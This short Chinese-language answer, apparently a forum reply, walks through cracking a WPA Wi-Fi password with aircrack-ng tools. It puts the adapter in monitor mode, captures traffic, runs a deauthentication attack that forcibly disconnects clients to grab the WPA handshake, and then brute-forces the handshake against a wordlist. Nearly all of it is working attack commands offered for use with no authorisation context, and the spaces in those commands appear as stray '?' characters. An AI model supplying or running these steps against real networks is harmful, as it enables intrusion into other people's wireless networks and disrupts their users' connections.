可以的。
步驟如下:
0、進入Terminnal
1、開始監控wlan(airmon-ng是BT5的工具)
airmon-ng ?start ?wlan0
2、開始抓包(test為抓到的包的文件命名)
airodump-ng ?-w ?test ?mon0
3、監控制定信道(-c後跟的參數是哪個頻道)
airodump-ng ?-c ?11 ?-w ?test ?mon0
4、Deauth攻擊(-0後跟的參數是攻擊次數)
這個操作主要是偽造數據包使客戶端與無線路由器斷鏈,從而重連,因此我們可以截獲到中間的數據包)
aireplay-ng ?-0 ?5 ?-a ?MAC地址(BSSID) -c ?MAC地址(STATION) mon0
5、出現WPA handshake字段
6、開始指定字典進行破解(-w後跟的是字典路徑,test-*.cap是指前面截獲到的數據包)
aircrack-ng ?-w ?/pentest/passwords/wordlists/yeslab.lst ?test-*.cap
7、完成。